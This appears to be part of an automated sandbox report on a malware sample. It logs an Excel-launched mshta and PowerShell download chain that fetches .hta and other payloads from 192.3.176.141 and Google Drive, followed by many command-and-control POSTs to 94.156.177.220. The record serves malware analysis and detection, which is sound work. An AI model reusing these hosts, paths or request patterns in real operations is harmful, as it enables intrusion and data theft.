                Source: global trafficHTTP traffic detected: GET /35/educationalthingswithgreatattitudeonhere.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49168 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE899B4B18 URLDownloadToFileW,6_2_000007FE899B4B18
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1AD36F6.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /ZDFWtO HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /ZDFWtO HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.176.141If-Range: "20a11-6252e32d56015"
                Source: global trafficHTTP traffic detected: GET /35/educationalthingswithgreatattitudeonhere.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /35/SMLPERR.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive
                Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: mpa.li
                Source: global trafficDNS traffic detected: DNS query: drive.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
